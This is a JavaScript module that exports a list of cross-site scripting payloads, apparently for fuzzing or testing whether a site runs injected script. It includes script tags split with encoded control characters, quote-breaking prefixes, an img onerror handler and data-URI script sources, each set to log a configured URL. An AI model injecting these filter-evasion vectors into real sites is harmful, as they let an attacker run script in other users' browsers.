const config = require('./config.js');

module.exports = [
  `');console.log(${JSON.stringify(config.url)});//`,
  `<script\x20type="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x3Etype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Dtype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x09type="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Ctype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script>console.log(${JSON.stringify(config.url)})</script>`,
  `<script\x2Ftype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Atype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `'\`"><\x3Cscript>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `'\`"><\x00script>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `<script onReadyStateChange script onReadyStateChange="javascript:javascript:console.log(${JSON.stringify(config.url)})"></script onReadyStateChange>`,
  `<script onLoad script onLoad="javascript:javascript:console.log(${JSON.stringify(config.url)})"></script onLoad>`,
  `\x3Cscript>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `'"\`><script>/* *\x2Fjavascript:console.log(${JSON.stringify(config.url)})// */</script>`,
  `<script>javascript:console.log(${JSON.stringify(config.url)})</script\x0D`,
  `<script>javascript:console.log(${JSON.stringify(config.url)})</script\x0A`,
  `<script>javascript:console.log(${JSON.stringify(config.url)})</script\x0B`,
  `--><!-- ---> <img src=xxx:x onerror=javascript:console.log(${JSON.stringify(config.url)})> -->`,
  `<script charset="\x22>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `<script>/* *\x2A/javascript:console.log(${JSON.stringify(config.url)})// */</script>`,
  `<script>/* *\x00/javascript:console.log(${JSON.stringify(config.url)})// */</script>`,
  `<script>if("x\\xE1\x96\x89".length==2) { javascript:console.log(${JSON.stringify(config.url)});}</script>`,
  `<script>if("x\\xE0\xB9\x92".length==2) { javascript:console.log(${JSON.stringify(config.url)});}</script>`,
  `<script>if("x\\xEE\xA9\x93".length==2) { javascript:console.log(${JSON.stringify(config.url)});}</script>`,
  `'\`"><\x3Cscript>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `'\`"><\x00script>javascript:console.log(${JSON.stringify(config.url)})</script>`,
  `<script src="data:text/plain\x2Cjavascript:console.log(${JSON.stringify(config.url)})"></script>`,
  `<script src="data:\xD4\x8F,javascript:console.log(${JSON.stringify(config.url)})"></script>`,
  `<script src="data:\xE0\xA4\x98,javascript:console.log(${JSON.stringify(config.url)})"></script>`,
  `<script src="data:\xCB\x8F,javascript:console.log(${JSON.stringify(config.url)})"></script>`,
  `<script\x20type="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x3Etype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Dtype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x09type="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Ctype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x2Ftype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
  `<script\x0Atype="text/javascript">javascript:console.log(${JSON.stringify(config.url)});</script>`,
];
// console.log(${JSON.stringify(config.url)})